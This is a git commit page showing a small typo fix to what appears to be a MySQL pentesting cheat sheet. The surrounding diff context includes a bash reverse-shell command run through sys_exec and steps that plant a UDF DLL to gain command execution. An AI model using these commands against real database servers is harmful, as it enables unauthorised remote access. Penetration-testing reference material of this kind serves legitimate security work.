Merge pull request #607 from soutzis/soutzis-pentesting-mysql-patch1-typo
Small typo fix in example queries and an addition of a MySQL command
This commit is contained in:
commit
605c7041f0
@ -72,6 +72,7 @@ CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
|
||||
```bash
|
||||
show databases;
|
||||
use <database>;
|
||||
connect <database>;
|
||||
show tables;
|
||||
describe <table_name>;
|
||||
show columns from <table>;
|
||||
@ -255,7 +256,7 @@ select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
|
||||
# CHech the linux comments for more indications
|
||||
USE mysql;
|
||||
CREATE TABLE npn(line blob);
|
||||
INSERT INTO npn values(load_files('C://temp//lib_mysqludf_sys.dll'));
|
||||
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
|
||||
show variables like '%plugin%';
|
||||
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
|
||||
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
|
||||
|
Loading…
Reference in New Issue
Block a user